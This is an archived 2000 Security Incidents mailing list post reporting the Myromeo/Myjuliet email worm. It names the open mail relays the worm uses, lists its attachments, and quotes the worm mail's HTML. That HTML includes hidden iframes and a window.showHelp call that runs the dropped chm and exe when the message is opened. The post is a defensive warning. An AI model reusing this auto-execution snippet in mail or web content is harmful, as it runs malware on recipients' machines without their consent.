Security Incidents mailing list archives
new virus - myromeo
From: Piotr Klaban <makler () MAN TORUN PL>
Date: Thu, 16 Nov 2000 09:19:54 +0100
Hi, Our nets were affected by the mail new virus - myromeo/myjuliet. This would not be recognized by the e.g. AVP with current virus database. Maybe you need to block it "by hand". WHAT IT DOES TO THE COMPUTER: Since I do not use Windows frequently, I do not know if this virus does something bad to the computer. I have only information described below. HOW IT WORKS: The mail opens an html page, and magicaly runs the exe part. After that it spreads across the net with mailing itself by connecting to the following smtp sites (it seems they are open relays): 212.244.199.2 - gate.panoramix.net.pl (down for now) 195.117.152.91 - dns.inter-grafix.com.pl (do not answer. overloaded?) 195.116.62.86 - madmax.quadrosoft.com 194.153.216.60 - mail1.getin.pl (open relay) madmax is not an open relay now, but it was yesterday (?): <from the mail> Received: from kmgwza (xxx [ip-num]) by madmax.quadrosoft.com (8.9.3/8.9.3) with SMTP id KAA11833; Wed, 15 Nov 2000 10:03:25 +0100 </from the mail> getin.pl is an open relay and responses with the following line: 220-mail1.getin.pl Microsoft SMTP MAIL ready at Thu, 16 Nov 2000 ... \ Version: 5.5.1877.357.35 VIRUS MAIL: There are a few attachments in the virus mail: 1 no description> [multipa/alternativ, 7bit, 0.7K] 2 +-><no description> [text/plain, quoted, iso-8859-2, 0K] 3 +-><no description> [text/html, quoted, iso-8859-2, 0.4K] 4 myromeo.exe [applica/x-msdownlo, base64, 38K] 5 myjuliet.chm [applica/octet-stre, base64, 8.5K] myromeo.exe is packed with UPX (very good pack utility). The html part consists of a few lines: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> </HEAD> <BODY BGCOLOR="black" TEXT="red"> <DIV> </DIV> <IFRAME width=3D1 height=3D1 src=3D"cid:000701bf8458$eb570380$dc0732d4@666"></IFRAME> <IFRAME width=3D1 height=3D1 src=3D"cid:000701bf8458$eb570381$dc0732d4@666"></IFRAME> <P></P> <SCRIPT> window.showHelp("c:/windows/temp/myjuliet.chm"); </SCRIPT> </BODY></HTML> Maybe Outlook Express need to be unpached to run that, do not know, but users say, that the attachment run by itself. Best regards, -- Piotr Klaban
Current thread:
- new virus - myromeo Piotr Klaban (Nov 17)
- <Possible follow-ups>
- Re: new virus - myromeo Justin Mason (Nov 18)